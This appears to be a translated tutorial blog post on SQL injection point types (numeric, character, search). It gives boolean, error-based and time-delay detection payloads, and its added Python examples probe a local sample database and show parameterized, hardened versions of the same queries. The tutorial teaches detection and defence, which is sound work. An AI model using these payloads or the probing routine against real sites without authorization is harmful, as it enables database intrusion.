SQL injection: the types of injection points, and how to determine whether injection exists

Analyzing the type of SQL injection
Injection points divide into numeric type, character type and search type.
For example, a numeric-type statement looks like: select * from table where id = 3, while a character-type statement looks like: select * from table where name = 'admin'. So when testing a character-type point, a quotation mark has to be added to close the parameter; if the page then returns correctly, injection exists. A numeric-type point needs no added quote.
1. Numeric type: the value is placed directly into the query, so the condition can simply be appended:
SELECT * FROM <table name> WHERE ID = X AND 1=1
SELECT * FROM <table name> WHERE ID = X AND 1=2
2. Character type: the value is quoted, so the injected fragment must first close the quote and then re-balance the trailing one:
SELECT * FROM <table name> WHERE ID = 'X' AND '1'='1'
SELECT * FROM <table name> WHERE ID = 'X' AND '1'='2'
3. Search type:

This type usually appears in search functions. For search-type injection we have to know whether the WHERE clause of the SQL query uses the LIKE operator. LIKE performs a fuzzy match, and a fuzzy match needs LIKE combined with a wildcard: "%" is the wildcard of the LIKE operator and stands for zero or more characters of any kind. A few examples to make this clear:

LIKE 'sina%' // returns any string that starts with sina

LIKE '%sina' // returns any string that ends with sina

LIKE '%sina%' // returns any string that contains sina

Because the value sits inside a pattern such as '%...%', the injected value has to close the pattern and its quote, then comment out what follows:
a%' and 1=1 -- page returns normally
a%' and 1=2 -- page returns abnormally (typically no results)
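The three injection point types above, worked through against a small database, as an added example that is not code from the original post. It uses Python's sqlite3 module with a constructed users table standing in for the application's backend; the vuln_* and safe_* functions are hypothetical application code, and the payloads are the ones given above with the closer each type requires. The second half shows the same three queries with bound parameters (and LIKE metacharacters escaped), where the identical payloads are treated as plain data.

```python
import sqlite3

# Constructed sample data (not from the original post): an in-memory SQLite
# database stands in for the web application's backend.
con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT);
INSERT INTO users VALUES (1, 'admin', 'administrator');
INSERT INTO users VALUES (2, 'alice', 'user');
INSERT INTO users VALUES (3, 'bob', 'user');
""")


def run(sql, params=()):
    """Execute one statement and return the matching rows."""
    return con.execute(sql, params).fetchall()


# --- Vulnerable builders (hypothetical app code), one per injection type.
# --- The user value is pasted straight into the SQL text.
def vuln_numeric(id_value):
    # Numeric type: the value is unquoted, so a payload needs no closing quote.
    return run(f"SELECT id, name FROM users WHERE id = {id_value}")


def vuln_character(name):
    # Character type: the value sits between single quotes; the payload closes
    # the opening quote and leaves a dangling '1 to re-balance the trailing one.
    return run(f"SELECT id, name FROM users WHERE name = '{name}'")


def vuln_search(term):
    # Search type: the value is wrapped in LIKE wildcards; the payload closes
    # the pattern and the quote, then comments out the remainder.
    return run(f"SELECT id, name FROM users WHERE name LIKE '%{term}%'")


# Boolean pairs from the post: the first form is true, the second false.
PAYLOADS = {
    "numeric":   (vuln_numeric,   "1 and 1=1",         "1 and 1=2"),
    "character": (vuln_character, "admin' and '1'='1", "admin' and '1'='2"),
    "search":    (vuln_search,    "a%' and 1=1 -- ",   "a%' and 1=2 -- "),
}


def row_counts(kind):
    """Rows returned for the true payload and the false payload of one type.
    A difference between the two counts is the classic sign of injection."""
    fn, true_p, false_p = PAYLOADS[kind]
    return len(fn(true_p)), len(fn(false_p))


# --- Hardened builders: the same queries with bound parameters, so the value
# --- is compared as data and can never change the statement's logic.
def safe_numeric(id_value):
    # int() rejects "1 and 1=1" with ValueError before any SQL runs.
    return run("SELECT id, name FROM users WHERE id = ?", (int(id_value),))


def safe_character(name):
    return run("SELECT id, name FROM users WHERE name = ?", (name,))


def escape_like(term, esc="\\"):
    """Escape LIKE metacharacters so user input cannot supply its own wildcards."""
    return term.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def safe_search(term):
    pattern = "%" + escape_like(term) + "%"
    return run("SELECT id, name FROM users WHERE name LIKE ? ESCAPE '\\'", (pattern,))


if __name__ == "__main__":
    for kind in PAYLOADS:
        print(kind, row_counts(kind))           # numeric (1, 0), character (1, 0), search (2, 0)
    print(safe_character("admin' and '1'='1"))  # [] : the whole string is looked up as a name
    print(safe_search("a%' and 1=1 -- "))       # [] : % is escaped and the quote is just data
```

The row-count pairs (1, 0), (1, 0) and (2, 0) are exactly the "normal / abnormal" page difference the post describes; with the bound-parameter versions both members of each pair return the same (empty) result, which is why the boolean test finds nothing there.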

Determining whether SQL injection exists
1. Method when there is a visible error
Take a site such as www.example.com/index.php?id=1. The first step is to determine whether injection exists: append a single quote ' after the number 1. If the page reports an error, SQL injection is present. Whether the injection point can actually be exploited, however, depends closely on the server's code and configuration (for example, the input may be filtered, certain dangerous functions may be unusable, or the parameter length may be limited). Second, logical operators can also be used: append and 1=1 and then and 1=2 to the parameter. If and 1=1 returns the page normally and and 1=2 returns an error, SQL injection is present. (This follows from the semantics of SQL's AND and OR operators: AND returns a record only when both conditions are true; OR returns a record when either condition is true.) Otherwise, injection does not necessarily exist. The same test can be done with or. Note that whether a comment symbol must be added, or the parameter closed, depends on the type of injection point.

2. Method when there is no visible error
When the single quote, and and or all produce no error, injection may still exist, because the server configuration may return the original page even when the parameter is wrong, so the page does not change although injection is present. In that case we can use the response time to determine whether injection exists, for example and if(1=0,1,sleep(10)): the condition 1=0 is false, so the else branch executes sleep(10) and the response is delayed by about ten seconds. Again, pay attention to whether a single quote or comment character is needed. Different databases have different delay functions (if() and sleep() here are MySQL's), so choose according to the circumstances.
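The checks from both parts of this section, put into one probing routine, as an added example that is not from the original post. It targets a constructed stand-in for the example URL's handler, backed by SQLite, in two hypothetical configurations: verbose_app reports database errors (part 1), silent_app swallows them and always serves the same page (part 2). SQLite has no SLEEP() or IF(), so the block registers a Python sleep() function under that name and uses CASE ... END in place of MySQL's if(); the 0.3 s delay and the 0.8 detection threshold are assumptions, as are the CLOSERS strings for each injection point type.

```python
import sqlite3
import time
from dataclasses import dataclass

# Constructed target (not from the original post): an in-memory SQLite
# database behind two hypothetical handlers for index.php?id=...
con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO users VALUES (1, 'admin');
INSERT INTO users VALUES (2, 'alice');
""")
# SQLite has no SLEEP(); register a Python function under that name so the
# time-delay technique can be exercised offline. MySQL has SLEEP() natively.
con.create_function("sleep", 1, lambda s: time.sleep(s) or 0)


@dataclass
class Response:
    error: bool     # did the page show a database error?
    body: str       # page content as the tester sees it
    seconds: float  # response time


def verbose_app(id_value):
    """Injectable handler that reports the database error (part 1)."""
    t0 = time.perf_counter()
    try:
        rows = con.execute(f"SELECT name FROM users WHERE id = {id_value}").fetchall()
        return Response(False, "users: " + ",".join(r[0] for r in rows), time.perf_counter() - t0)
    except sqlite3.Error as e:
        return Response(True, f"SQL error: {e}", time.perf_counter() - t0)


def silent_app(id_value):
    """Injectable handler that hides errors and always serves one page (part 2)."""
    t0 = time.perf_counter()
    try:
        con.execute(f"SELECT name FROM users WHERE id = {id_value}").fetchall()
    except sqlite3.Error:
        pass
    return Response(False, "welcome", time.perf_counter() - t0)


# Closers by injection point type (assumed): what must precede "and ..." and
# what must follow it so the rest of the original statement still parses.
CLOSERS = {"numeric": ("", ""), "character": ("'", " -- "), "search": ("%'", " -- ")}


def detect(request, base, kind="numeric", delay=0.3):
    """Run the post's three checks against one parameter; report which fired."""
    prefix, suffix = CLOSERS[kind]
    normal = request(base)
    findings = {}

    # 1. Error-based: a stray quote breaks the statement if it reaches the parser.
    findings["quote_error"] = request(base + "'").error

    # 2. Boolean-based: "and 1=1" keeps the page, "and 1=2" changes it.
    t = request(f"{base}{prefix} and 1=1{suffix}")
    f = request(f"{base}{prefix} and 1=2{suffix}")
    findings["boolean_diff"] = (not t.error and t.body == normal.body
                                and f.body != normal.body)

    # 3. Time-based (same shape as if(1=0,1,sleep(10))): the condition is false,
    # so the ELSE branch sleeps and the response is slower than baseline even
    # when the page content is identical.
    slow = request(f"{base}{prefix} and (case when 1=0 then 1 else sleep({delay}) end){suffix}")
    findings["time_delay"] = slow.seconds - normal.seconds >= delay * 0.8
    return findings


if __name__ == "__main__":
    print("verbose:", detect(verbose_app, "1"))  # all three checks fire
    print("silent :", detect(silent_app, "1"))   # only time_delay fires
```

Against silent_app the quote and the boolean pair tell the tester nothing, because every request returns "welcome"; the delayed response is the only signal, which is the situation part 2 describes. In a real test, measure the baseline several times and use a delay well above the server's normal jitter before trusting a single slow response.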


Origin www.cnblogs.com/zzhoo/p/12358384.html